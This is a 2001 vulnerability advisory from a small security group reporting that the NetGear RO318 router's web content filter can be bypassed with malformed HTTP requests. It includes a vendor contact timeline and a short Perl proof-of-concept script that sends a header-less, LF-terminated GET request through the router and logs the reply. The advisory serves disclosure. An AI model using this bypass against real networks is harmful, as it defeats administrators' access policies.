=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ NetGear RO318 HTTP Filter Advisory                                             =+
=+ Null Byte Security                                                             =+
=+ http://home.tampabay.rr.com/nbs/                                               =+
=+ don't call it a come back                                                      =+
=+ nbs@tampabay.rr.com                                                            =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ Contents Table                                                                 =+
=+                                                                                =+
=+ 1.About                                                                        =+
=+ 2.Affected                                                                     =+
=+ 3.Details                                                                      =+
=+ 4.Contact                                                                      =+
=+ 5.Conclusion                                                                   =+
=+ 6.Thanks                                                                       =+
=+ 7.Greets                                                                       =+
=+ 8.POC                                                                          =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 1.About                                                                        =+
=+                                                                                =+
=+ NETGEAR's sturdy metal RO318 Cable/DSL Security Router with 8-port switch      =+
=+ fully protects your small office network against intrusion. Equipped with      =+
=+ Stateful Packet Inspection to prevent Denial of Service (DoS) attacks, and     =+
=+ Network Address Translation (NAT) to maintain network security against         =+
=+ hackers, it ensures prolonged up time and maximized productivity for your      =+
=+ network. Web content filtering options let network administrators establish    =+
=+ restricted access policies - based on the time of day, day of week, Web        =+
=+ address keyword - and receive regular reports and instant alerts via e-mail on =+
=+ hacker attempts and browsing activities. Web-based installation instructions   =+
=+ make setup easy. Your network up and running, and sharing high-speed Internet  =+
=+ access with up to 253 users, in less than an hour.                             =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 2.Affected                                                                     =+
=+                                                                                =+
=+ NetGear RO318 Cable/DSL Security Router                                        =+
=+                                                                                =+
=+ Although the NetGear RO318 is the only router listed here, we are sure there   =+
=+ are other routers that use the RO318's web filtering technology.               =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 3.Details                                                                      =+
=+                                                                                =+
=+ We are not too sure of the details ourselves because of time constraints, but  =+
=+ we do have an idea: the web filtering component in the firmware only checks    =+
=+ fully constructed requests, so sending a somewhat malformed request results    =+
=+ in the retrieval of restricted content.                                        =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 4.Contact                                                                      =+
=+                                                                                =+
=+ December 2 2001: Contacted NetGear                                             =+
=+ December 2 2001: Contacted online support                                      =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460001)       =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460003)       =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460006)       =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460008)       =+
=+ December 8 2001: Five working days passed                                      =+
=+ December 20 2001: Eighteen days passed                                         =+
=+ December 20 2001: Advisory released on home.tampabay.rr.com/nbs/               =+
=+ December 26 2001: POC released                                                 =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 5.Conclusion                                                                   =+
=+                                                                                =+
=+ This is definitely a security vulnerability and not a feature. We hope NetGear =+
=+ will fix this with their next firmware release so administrators can           =+
=+ restrict necessary web-content without having to worry about this bug.         =+
=+                                                                                =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 6.Thanks                                                                       =+
=+                                                                                =+
=+ Bi0cide for the help                                                           =+
=+ Datagram for the help                                                          =+
=+ Natas for the help                                                             =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 7.Greets                                                                       =+
=+                                                                                =+
=+ Bi0cide, Natas, Datagram, Z, Medium, BrainStorm, Qitest1, Skerbi, RootX11,     =+
=+ Doug, Bios Disk, Decypher, Notten, RFP, Johnny (johnny.ihackstuff.com), RFP,   =+
=+ Mixter, Pimpshiz, Doxavg, Todd, Sekurity Inc (www.sekurity.net), Packet Storm, =+
=+ Security Focus, and everyone else.                                             =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 8.POC                                                                          =+
=+                                                                                =+
#!/usr/bin/perl
#don't call it a come back
#nbs@tampabay.rr.com

use IO::Socket;
use Getopt::Std;

# Command line: -h <host> is required, -p <port> is optional. The spec also
# accepts a bare -z switch, but nothing in this script ever reads it.
getopts('h:p:z', \%argv);

# No target host given: show the banner and usage text, then stop. A bare
# exit leaves with status 0.
unless (defined $argv{h})
{
    print "NetGear RO318 Web Filter Bypass Exploit by Null Byte Security   \n";

    print "Usage: $0 -h <host> -p <port>                                   \n";
    exit;
}

# Reaching this point means -h was supplied (the branch above exits
# otherwise), so run the request/log routine.
begin();

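# begin - send one minimal HTTP request through the router and log the reply.
#
# Takes no arguments; reads the package hash %argv filled in by getopts().
# Connects to $argv{h} on $argv{p} (default 80), sends "GET / HTTP/1.0",
# and appends every line of the response to a file named "html" in the
# current working directory.
#
# Dies if the TCP connection cannot be made or the log file cannot be
# opened or closed. Returns nothing meaningful.
#
# NOTE(review): the request carries no Host: header and terminates its
# lines with a bare LF instead of CRLF. The advisory does not say which
# property the filter fails to handle, so this is only an observation
# about what is sent. For anyone validating a firmware fix: a content
# filter should deny, not pass, requests it cannot fully parse.
sub begin
{
    # The original used the bareword html, which Perl (without strict)
    # treats as the string "html"; spell it as a string explicitly.
    my $html = 'html';
    my $host = $argv{h};
    my $port = defined $argv{p} ? $argv{p} : "80";

    my $socket = IO::Socket::INET->new (Proto => "tcp",
                                     PeerAddr => $host,
                                     PeerPort => "$port")
                                     or die "Connection Refused.\n";

    # Open the log once, in append mode, with three-argument open and an
    # error check. The original re-opened a bareword handle with two-argument
    # open for every response line and never checked the result, so a failed
    # open silently discarded the whole response.
    open(my $log, '>>', $html)
        or die "Cannot open $html for appending: $!\n";

    print {$socket} "GET / HTTP/1.0\n\n";

    # The response is untrusted data; it is written to the log verbatim and
    # never interpreted here.
    while (my $line = <$socket>)
    {
        print {$log} $line;
    }

    # Buffered write errors surface at close, so check it.
    close($log) or die "Cannot close $html: $!\n";
    close $socket;
}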
=+                                                                                =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ http://www.wiretrip.net/rfp/policy.html                                        =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+